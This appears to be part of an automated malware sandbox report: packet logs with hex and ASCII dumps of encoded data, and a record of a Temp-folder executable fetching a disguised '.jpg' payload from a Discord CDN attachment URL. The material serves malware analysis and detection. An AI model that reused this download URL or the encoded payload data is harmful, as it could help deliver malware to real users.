O Em O mp O WE O XW O qJq
2021-10-29 18:50:00 UTC	1157	IN	Data Raw: 4f 20 44 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 44 20 4f 20 45 45 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 45 45 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 71 71 71 20 4f 20 45 71 20 4f 20 44 45 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 45 45 20 4f 20 45 70 20 4f 20 45 45 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 71 Data Ascii: O DX O DW O Eq O DW O Xq O EJ O mE O DW O qOp O DM O DW O EE O DD O EE O Eq O DW O mM O XW O qOO O Em O Xq O Xq O EE O EE O DW O qqq O Eq O DE O DE O qqW O Eq O DW O Xq O XW O EO O DD O qqM O EE O Ep O EE O DD O DM O Eq O DW O mM O XW O qOO O Ep O DW O Xq
2021-10-29 18:50:00 UTC	1160	IN	Data Raw: 20 4f 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 57 20 4f 20 57 44 20 4f 20 58 44 20 4f 20 71 4f 4d 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 6d 4d 20 4f 20 71 4f 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 71 71 6d 20 4f 20 4d 45 20 4f 20 45 45 20 4f 20 71 71 6d 20 4f 20 58 71 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 71 71 58 20 4f 20 57 6d 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 6d 4d 20 4f 20 71 71 71 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 45 71 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 4d 4d 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4f 71 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 71 71 58 20 4f 20 58 4d 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 71 4f 4f 20 4f 20 45 57 20 4f 20 Data Ascii: O MX O qOE O qqW O WD O XD O qOM O DD O qqX O MX O qJJ O mM O qOE O qqD O qOq O qqm O ME O EE O qqm O Xq O qqq O qqq O qOm O qOE O qqX O Wm O qqq O MX O mM O qqq O qOX O MM O Eq O EW O DD O MM O WO O EX O qOq O qqq O ED O qqX O XM O Wq O EX O qOO O EW O
2021-10-29 18:50:00 UTC	1165	IN	Data Raw: 20 4f 20 4d 4d 20 4f 20 6d 4d 20 4f 20 71 4f 4a 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 45 71 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 6d 20 4f 20 71 71 4d 20 4f 20 71 71 4d 20 4f 20 71 4f 57 20 4f 20 71 71 70 20 4f 20 45 4f 20 4f 20 71 4a 4f 20 4f 20 45 6d 20 4f 20 71 71 6d 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 58 70 20 4f 20 45 4d 20 4f 20 45 44 20 4f 20 71 71 4f 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 45 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 58 57 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 58 4a 20 4f 20 57 70 20 4f 20 71 4f 4f 20 4f 20 45 4d 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 4f 71 20 4f 20 45 57 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 58 Data Ascii: O MM O mM O qOJ O DM O WE O Eq O WO O WO O WO O Wm O qqM O qqM O qOW O qqp O EO O qJO O Em O qqm O qqX O qOO O Xp O EM O ED O qqO O DW O MO O EM O Xq O DW O qOO O MX O XW O ME O MM O XJ O Wp O qOO O EM O qqE O DW O XM O qOq O EW O mE O qOO O MM O qqO O X
2021-10-29 18:50:00 UTC	1169	IN	Data Raw: 20 4f 20 58 57 20 4f 20 57 44 20 4f 20 45 57 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 57 70 20 4f 20 58 4d 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 6d 58 20 4f 20 71 4f 70 20 4f 20 45 44 20 4f 20 45 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 44 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 45 6d 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 71 4f 45 20 4f 20 58 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 45 4a 20 4f 20 6d 4d 20 4f 20 71 71 45 20 4f 20 45 4a 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4a 71 20 4f 20 58 6d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 45 58 20 4f 20 6d 58 20 4f 20 4d 4f 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 58 4a 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 45 20 4f 20 44 44 20 4f 20 58 70 20 4f 20 71 4f Data Ascii: O XW O WD O EW O mp O EW O DD O Wp O XM O qOD O qOO O mX O qOp O ED O Eq O qOm O qOD O WE O EO O Em O qqW O DW O qOE O XE O qOJ O qOp O EJ O mM O qqE O EJ O qOJ O qqX O qJq O Xm O MX O MX O qJJ O EX O mX O MO O ME O qqX O XJ O Eq O WJ O DE O DD O Xp O qO
2021-10-29 18:50:00 UTC	1173	IN	Data Raw: 4d 20 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 4f 4a 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4a 4a 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 70 20 4f 20 71 4f 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 4f 58 20 4f 20 71 4f 6d 20 4f 20 71 4a 4a 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 71 71 45 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 4a 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 4d 4d 20 4f 20 71 4a 4a 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 Data Ascii: M O qqp O pE O qqO O pE O qqW O qOX O qOM O qOJ O qOJ O qJq O pE O qOO O pE O ME O qJJ O qOm O pE O qp O qO O pE O qqM O qOX O qOm O qJJ O qOD O qOm O qJO O qqE O qJJ O pE O qqW O pE O qJJ O qqE O qOW O MM O qJJ O qqp O qqm O qqp O ME O qqX O pE O MM O pE
2021-10-29 18:50:00 UTC	1177	IN	Data Raw: 4f 20 71 71 6d 20 4f 20 71 4f 6d 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 4d 58 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 6d 20 4f 20 71 4f 57 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 44 20 4f 20 71 4f 70 20 4f 20 71 4f 44 20 4f 20 71 4f 44 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 4d 45 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 71 4f 4d 20 4f 20 71 4f 58 20 4f 20 71 4f Data Ascii: O qqm O qOm O qOm O pE O qqO O pE O qqq O MX O qOX O MX O qqJ O qqq O qOq O qOD O qqO O pE O qqW O pE O qOm O qOW O qOO O pE O qOq O pE O qqD O qqm O qqD O qOp O qOD O qOD O qOM O MX O qOD O qOO O ME O qOJ O qqX O qOJ O pE O pJ O pE O qOW O qOM O qOX O qO
2021-10-29 18:50:00 UTC	1181	IN	Data Raw: 4d 45 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 4f 71 20 4f 20 4d 4d 20 4f 20 71 71 44 20 4f 20 71 71 4f 20 4f 20 71 4f 6d 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 70 20 4f 20 71 4f 71 20 4f 20 71 4a 71 20 4f 20 71 4f 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 4d 20 4f 20 71 4f 44 20 4f 20 Data Ascii: ME O qOX O qqW O qJJ O pE O qqW O pE O qqp O qqm O qOq O MM O qqD O qqO O qOm O MM O pE O ME O pE O qqM O qqE O qJO O qOq O qOm O pE O MX O pE O qOO O qqp O qOq O qJq O qOm O qqO O qOX O qqJ O pE O qOX O pE O MX O qOM O MX O qOX O qJJ O qqJ O qOM O qOD O
2021-10-29 18:50:00 UTC	1185	IN	Data Raw: 71 71 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 71 71 4f 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 58 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 44 20 4f 20 71 4f 58 20 4f 20 71 71 4f 20 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4d 20 4f 20 71 4a 4a 20 4f 20 71 4f 57 20 4f 20 71 4f 6d 20 4f 20 Data Ascii: qqJ O qOm O qOE O MX O qOO O MX O qOD O qqE O qOW O qqO O qOJ O qJq O MX O MX O pE O qOq O pE O qqD O qOq O MX O qOm O qOX O qJO O pE O qOO O pE O qqq O qqX O ME O pE O qOW O pE O qqD O qqD O qOX O qqO O qqp O pE O MM O pE O qOO O qqM O qJJ O qOW O qOm O
2021-10-29 18:50:00 UTC	1189	IN	Data Raw: 20 71 71 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 4d 20 4f 20 71 71 70 20 4f 20 71 71 44 20 4f 20 71 4f 4a 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 71 57 20 4f 20 71 4f 4f 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 71 4a 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 45 20 4f 20 71 4a 71 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 71 71 44 20 4f 20 71 4a 4a 20 4f 20 71 Data Ascii: qqq O qOO O qOq O qOm O qJO O pE O qOq O pE O qJq O qOO O qOM O qqp O qqD O qOJ O ME O MM O qqJ O pE O ME O pE O qqq O qqq O qqW O qOO O qqW O MX O qOM O MX O qOE O qqM O qJO O qOM O qOO O qqX O pE O qOX O pE O qJO O qOE O qJq O qJO O qOp O qqD O qJJ O q
2021-10-29 18:50:00 UTC	1192	IN	Data Raw: 20 4f 20 71 4f 71 20 4f 20 71 4f 45 20 4f 20 71 71 71 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4f 4d 20 4f 20 71 4a 71 20 4f 20 71 71 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 44 71 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 4d 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 71 71 45 20 4f 20 71 71 45 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 70 20 4f 20 71 4f 4d 20 4f 20 71 71 4a 20 4f 20 71 71 4d 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 71 57 20 4f 20 4d 45 20 4f 20 71 Data Ascii: O qOq O qOE O qqq O qJJ O qqq O pE O qqD O pE O ME O qOM O qJq O qqJ O qOm O qOO O qJJ O qqq O qOq O pE O Dq O pE O qJO O ME O qJO O qOO O qqE O qqE O pE O pJ O pE O qqM O qqp O qOM O qqJ O qqM O qqX O pE O qOO O pE O qqp O qOm O qOX O qOM O qqW O ME O q
2021-10-29 18:50:00 UTC	1197	IN	Data Raw: 20 71 71 58 20 4f 20 71 4f 44 20 4f 20 71 71 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 44 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 6d 20 4f 20 71 4a 71 20 4f 20 71 4f 4a 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 4d 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 70 Data Ascii: qqX O qOD O qqm O qqM O qOO O qOW O qOp O qJq O pE O qqW O pE O qqD O qOD O qqM O MM O qqO O qOX O qqm O qJq O qOJ O qqJ O qqq O qOJ O pE O MM O pE O qOJ O qOp O MX O qqX O qOO O pE O qqW O pE O qJq O qqM O MX O qqW O qOX O qqW O qOE O MX O qqO O qqm O p
2021-10-29 18:50:00 UTC	1201	IN	Data Raw: 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4d 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 71 44 20 4f 20 71 71 57 20 4f 20 71 71 6d 20 4f 20 4d 58 20 4f 20 4d 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 44 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f 20 71 71 57 20 4f 20 71 4a 4f 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 70 Data Ascii: pE O MM O pE O qOM O qOE O qOX O qqD O qqW O qqm O MX O ME O qOO O pE O qqq O pE O qOX O qqE O qJO O qOD O MM O qOJ O qqW O qJO O qqD O qqm O qqq O qJO O pE O qqO O pE O qqX O qOE O qqM O MX O MX O qqM O MM O qqJ O qJJ O pE O qOJ O pE O MX O qOJ O qOO O p
2021-10-29 18:50:00 UTC	1205	IN	Data Raw: 20 4d 4d 20 4f 20 4d 4d 20 4f 20 71 4f 57 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 57 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 71 20 4f 20 4d 45 20 4f 20 4d 45 20 4f 20 71 4f 71 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4f 4d 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 71 4f 4a Data Ascii: MM O MM O qOW O qOq O qqW O qqJ O qOp O qqO O qOW O qqE O qqW O qOJ O pE O qOJ O pE O qOO O qqJ O qqW O MX O qqO O qqq O ME O ME O qOq O ME O qOW O pE O qOW O pE O qqm O qqO O qOE O qOX O qOp O qqO O qOM O qOp O qOW O qOp O qOM O pE O qOp O pE O MM O qOJ
2021-10-29 18:50:00 UTC	1209	IN	Data Raw: 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 71 45 20 4f 20 71 71 4a 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 4d 45 20 4f 20 71 4a 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 45 20 4f 20 4d 45 20 4f 20 71 4f 4a 20 4f 20 71 71 4f 20 4f 20 71 4f 4f 20 4f 20 71 4a 4f 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 57 20 4f 20 71 4a 71 20 4f 20 4d 45 20 4f 20 71 4f 70 20 4f 20 71 71 71 20 4f 20 71 4f 70 Data Ascii: E O qOX O qOE O qOX O qqJ O qqq O qqX O qOq O qOX O qJO O qOW O pE O qqO O pE O qOO O qOJ O qJq O pE O qOJ O pE O qqE O qqJ O qqM O MX O ME O qJO O qqM O qOE O ME O qOJ O qqO O qOO O qJO O qqO O pE O qOW O pE O qOX O qOE O qOW O qJq O ME O qOp O qqq O qOp
2021-10-29 18:50:00 UTC	1213	IN	Data Raw: 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 4d 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 71 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 71 70 20 4f 20 71 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 58 4a 20 4f 20 70 45 20 4f 20 71 4f 6d 20 4f 20 71 71 57 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 71 58 20 4f 20 71 4f 58 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4a 71 20 Data Ascii: pE O qqW O pE O qOD O qqE O qOO O qOD O qOW O pE O MJ O pE O qOO O qOD O qOm O qOO O qOJ O MX O qOX O qJJ O qOO O qOD O qqm O qOO O qOp O pE O qp O qO O pE O qOO O qOJ O qOO O qqJ O pE O XJ O pE O qOm O qqW O qOD O qOm O qqX O qOX O qOJ O qqX O qOO O qJq
2021-10-29 18:50:00 UTC	1229	IN	Data Raw: 4f 20 57 44 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 57 4f 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 6d 4d 20 4f 20 6d 58 20 4f 20 57 71 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 71 4a 57 20 4f 20 4d 4a 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 71 20 4a 71 20 44 58 20 4f 20 71 71 6d 20 4f 20 71 4f 57 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20 71 71 6d 20 4f 20 44 58 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 4d 4d 20 4f 20 4f 20 71 4a 58 20 71 45 57 20 58 70 20 4f 20 58 4d 20 4f 20 58 70 20 4f 20 58 6d 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 4d 4a 20 4f 20 44 45 20 4f 20 71 71 71 20 4f 20 71 71 4f 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 71 4f 58 20 4f 20 58 70 20 4f 20 71 4f 71 20 4f 20 71 71 44 20 4f 20 6d 58 Data Ascii: O WD O mX O mX O WO O DD O DM O mM O mX O Wq O mM O WD O qJW O MJ O mX O mX O mX O mX O q Jq DX O qqm O qOW O qqX O qOq O qqm O DX O qOq O qqW O MM O O qJX qEW Xp O XM O Xp O Xm O DM O EE O MJ O DE O qqq O qqO O qqD O qqm O qqq O qOX O Xp O qOq O qqD O mX
2021-10-29 18:50:00 UTC	1241	IN	Data Raw: 4a 20 6d 20 4a 57 4f 20 4f 20 4f 20 71 4d 4a 20 6d 20 71 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 70 71 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4a 20 71 20 4f 20 71 4d 4a 20 6d 20 70 70 20 71 20 4f 20 71 4d 4a 20 6d 20 70 6d 20 71 20 4f 20 71 4d 4a 20 6d 20 70 57 20 71 20 4f 20 71 4d 4a 20 6d 20 70 44 20 71 20 4f 20 71 4d 4a 20 6d 20 70 45 20 71 20 4f 20 71 4d 4a 20 6d 20 70 58 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4d 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 71 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 4a 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 70 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 6d 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 57 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 44 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 45 20 Data Ascii: J m JWO O O qMJ m qO q O qMJ m pO q O qMJ m pq q O qMJ m pJ q O qMJ m pp q O qMJ m pm q O qMJ m pW q O qMJ m pD q O qMJ m pE q O qMJ m pX q O qMJ m pM q O qMJ m mO q O qMJ m mq q O qMJ m mJ q O qMJ m mp q O qMJ m mm q O qMJ m mW q O qMJ m mD q O qMJ m mE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49817	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-29 18:50:03 UTC	1254	OUT	GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-10-29 18:50:03 UTC	1254	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:03 GMT Content-Type: image/jpeg Content-Length: 406075 Connection: close CF-Ray: 6a5e965d8d8b5c44-FRA Accept-Ranges: bytes Age: 3194 Cache-Control: public, max-age=31536000 ETag: "4be3e6f4d4f4aa1116f6c74f532cbeb7" Expires: Sat, 29 Oct 2022 18:50:03 GMT Last-Modified: Fri, 29 Oct 2021 17:49:11 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635529751768404 x-goog-hash: crc32c=bHQJMA== x-goog-hash: md5=S+Pm9NT0qhEW9sdPUyy+tw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 406075 X-GUploader-UploadID: ADPycdtQMHGyEhnppJ8P837WdZk3TFi4GDGE6cytjZ9NP8ck3B0QplKsdro4zTxd-YyGcioOy6QRjSQ8JvbrhdjjkmE X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SFEM9tISoYB%2BEqK1Dp0vqlbM26O7TE7upemjyVfZpGF7C53qbbKrHhBexsiFFXMfclFfHU5Rntkqv8H7D6UJmPBuUL4s6%2FmLnyRsRRNPyq1pYdHcOQlMVAV%2FlYLNWI7zsPe3rg%3D%3D"}],"group":"cf-nel","max_age":604800}
